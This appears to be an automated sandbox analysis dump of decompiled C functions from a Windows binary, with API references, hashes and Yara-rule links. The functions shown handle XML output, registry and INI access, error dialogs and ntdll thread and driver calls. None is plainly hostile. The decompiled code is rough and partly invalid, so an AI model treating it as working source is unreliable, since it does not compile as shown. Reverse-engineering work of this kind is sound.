						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                      0x004079a4
                                                                                      0x004079b8
                                                                                      0x004079bd
                                                                                      0x004079c2
                                                                                      0x004079c5
                                                                                      0x004079c5
                                                                                      0x004079db
                                                                                      0x004079f7
                                                                                      0x00407a06
                                                                                      0x00407a0c
                                                                                      0x00407a11
                                                                                      0x00407a13
                                                                                      0x00407a14
                                                                                      0x00407a17
                                                                                      0x00407a18
                                                                                      0x00407a1d
                                                                                      0x00407a22
                                                                                      0x00407a25
                                                                                      0x00407a2a
                                                                                      0x00407a35
                                                                                      0x00407a3a
                                                                                      0x00407a3b
                                                                                      0x00407a40
                                                                                      0x00407a52

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004079DB
                                                                                        • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407A25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                      • API String ID: 1775345501-2769808009
                                                                                      • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                      • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                      0x00404683
                                                                                      0x00404692
                                                                                      0x00404699
                                                                                      0x0040469b
                                                                                      0x004046af
                                                                                      0x004046ba
                                                                                      0x004046bc
                                                                                      0x004046c7
                                                                                      0x004046cc
                                                                                      0x004046cd
                                                                                      0x004046ee
                                                                                      0x004046f3
                                                                                      0x004046fa
                                                                                      0x004046fa
                                                                                      0x004046ee
                                                                                      0x00404705

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004046AF
                                                                                      • _snwprintf.MSVCRT ref: 004046CD
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CloseOpen_snwprintfmemset
                                                                                      • String ID: %s\shell\%s
                                                                                      • API String ID: 1458959524-3196117466
                                                                                      • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                      • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 16%
                                                                                      			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                      0x00409d5f
                                                                                      0x00409d67
                                                                                      0x00409d70
                                                                                      0x00409ddb
                                                                                      0x00409d72
                                                                                      0x00409d74
                                                                                      0x00409db2
                                                                                      0x00409d84
                                                                                      0x00409d84
                                                                                      0x00409d8c
                                                                                      0x00409d8d
                                                                                      0x00409d98
                                                                                      0x00409d9d
                                                                                      0x00409d9e
                                                                                      0x00409da6
                                                                                      0x00409daf
                                                                                      0x00409daf
                                                                                      0x00409dc3
                                                                                      0x00409dc3

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409D79
                                                                                      • _snwprintf.MSVCRT ref: 00409D9E
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                      • String ID: "%s"
                                                                                      • API String ID: 1343145685-3297466227
                                                                                      • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                      • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 38%
                                                                                      			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                      0x004047d2
                                                                                      0x004047da
                                                                                      0x004047e0
                                                                                      0x004047e4
                                                                                      0x004047ec
                                                                                      0x004047ec
                                                                                      0x004047f5
                                                                                      0x00404800
                                                                                      0x00404801
                                                                                      0x00404802
                                                                                      0x0040480d
                                                                                      0x00404812
                                                                                      0x00404813
                                                                                      0x00404834

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                      • _snwprintf.MSVCRT ref: 00404813
                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                      • String ID: Error$Error %d: %s
                                                                                      • API String ID: 313946961-1552265934
                                                                                      • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                      • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                      0x004068ec
                                                                                      0x004068f0
                                                                                      0x004068f4
                                                                                      0x004068ff
                                                                                      0x00406902
                                                                                      0x0040690a
                                                                                      0x00406910
                                                                                      0x00406911
                                                                                      0x0040691b
                                                                                      0x0040691e
                                                                                      0x00406923
                                                                                      0x0040692d
                                                                                      0x0040692e
                                                                                      0x00406933
                                                                                      0x0040693d
                                                                                      0x00406940
                                                                                      0x00406949
                                                                                      0x0040694a
                                                                                      0x00406950
                                                                                      0x00406956
                                                                                      0x00406959
                                                                                      0x0040695c
                                                                                      0x00406964
                                                                                      0x0040696d
                                                                                      0x00406974
                                                                                      0x0040697e
                                                                                      0x00406989
                                                                                      0x00406990
                                                                                      0x00406998
                                                                                      0x0040699b
                                                                                      0x0040699f
                                                                                      0x004069b8
                                                                                      0x004069bc
                                                                                      0x004069c4
                                                                                      0x004069c7
                                                                                      0x004069c7
                                                                                      0x004069cb
                                                                                      0x004069ce
                                                                                      0x004069d4
                                                                                      0x004069d4
                                                                                      0x004069d9
                                                                                      0x004069df
                                                                                      0x004069e6
                                                                                      0x004069ea
                                                                                      0x004069ef
                                                                                      0x004069f2
                                                                                      0x004069f5
                                                                                      0x00406a00
                                                                                      0x00406a01
                                                                                      0x00406a06
                                                                                      0x00406a08
                                                                                      0x00406a0b
                                                                                      0x00406a10
                                                                                      0x00406a16
                                                                                      0x00406a25
                                                                                      0x00406a25
                                                                                      0x00406a18
                                                                                      0x00406a1e
                                                                                      0x00406a1e
                                                                                      0x00406a27
                                                                                      0x00406a2f
                                                                                      0x00406a32
                                                                                      0x00406a35
                                                                                      0x00406a3b
                                                                                      0x00406a41
                                                                                      0x00406a47
                                                                                      0x00406a4d
                                                                                      0x00406a53
                                                                                      0x00406a5d
                                                                                      0x00406a6d

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                      • memcpy.MSVCRT ref: 0040696D
                                                                                      • memcpy.MSVCRT ref: 0040697E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 975042529-0
                                                                                      • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                      • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                      0x004097b1
                                                                                      0x004097b9
                                                                                      0x004097bb
                                                                                      0x004097be
                                                                                      0x004097c3
                                                                                      0x004097ca
                                                                                      0x004097de
                                                                                      0x004097de
                                                                                      0x004097e3
                                                                                      0x004097e5
                                                                                      0x004097e5
                                                                                      0x004097ec
                                                                                      0x004097f3
                                                                                      0x004097f6
                                                                                      0x004097fe
                                                                                      0x00409802
                                                                                      0x00409805
                                                                                      0x0040980a
                                                                                      0x0040980d
                                                                                      0x00409810
                                                                                      0x00409822
                                                                                      0x00000000
                                                                                      0x00409827
                                                                                      0x0040982a
                                                                                      0x004098da
                                                                                      0x004098da
                                                                                      0x004098dc
                                                                                      0x004098e0
                                                                                      0x004098e9
                                                                                      0x004098ec
                                                                                      0x004098f6
                                                                                      0x004098f6
                                                                                      0x004098e2
                                                                                      0x00000000
                                                                                      0x004098e2
                                                                                      0x00409830
                                                                                      0x00409833
                                                                                      0x00409838
                                                                                      0x0040983b
                                                                                      0x0040983e
                                                                                      0x0040985f
                                                                                      0x0040985f
                                                                                      0x00409861
                                                                                      0x00409863
                                                                                      0x0040989e
                                                                                      0x004098b1
                                                                                      0x004098b8
                                                                                      0x004098c0
                                                                                      0x004098c5
                                                                                      0x004098d5
                                                                                      0x00409865
                                                                                      0x00409865
                                                                                      0x00409865
                                                                                      0x0040986c
                                                                                      0x00409878
                                                                                      0x0040987f
                                                                                      0x0040988a
                                                                                      0x0040988f
                                                                                      0x0040988f
                                                                                      0x0040986c
                                                                                      0x00000000
                                                                                      0x00409863
                                                                                      0x00409840
                                                                                      0x00409843
                                                                                      0x00409846
                                                                                      0x0040984b
                                                                                      0x00409852
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409854
                                                                                      0x0040985d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040985d
                                                                                      0x00409894
                                                                                      0x00000000
                                                                                      0x00409894

                                                                                      APIs
                                                                                        • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                      • memset.MSVCRT ref: 00409805
                                                                                      • memcpy.MSVCRT ref: 0040988A
                                                                                      • memcpy.MSVCRT ref: 004098C0
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                      • String ID:
                                                                                      • API String ID: 3641025914-0
                                                                                      • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                      • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 68%
                                                                                      			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                      0x004067ac
                                                                                      0x004067af
                                                                                      0x004067b5
                                                                                      0x004067ba
                                                                                      0x004067bf
                                                                                      0x004067c1
                                                                                      0x004067c6
                                                                                      0x004067c7
                                                                                      0x004067cc
                                                                                      0x004067cd
                                                                                      0x004067d2
                                                                                      0x004067d4
                                                                                      0x004067d9
                                                                                      0x004067da
                                                                                      0x004067df
                                                                                      0x004067e0
                                                                                      0x004067e5
                                                                                      0x004067e7
                                                                                      0x004067ec
                                                                                      0x004067ed
                                                                                      0x004067f2
                                                                                      0x004067f3
                                                                                      0x004067f8
                                                                                      0x004067fa
                                                                                      0x004067ff
                                                                                      0x00406800
                                                                                      0x00406805
                                                                                      0x00406806
                                                                                      0x00406808
                                                                                      0x0040680f
                                                                                      0x00406810
                                                                                      0x00406812
                                                                                      0x00406817
                                                                                      0x0040681e
                                                                                      0x00406828
                                                                                      0x0040682b
                                                                                      0x0040682c
                                                                                      0x0040681e
                                                                                      0x00406835
                                                                                      0x00406839
                                                                                      0x00406841

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
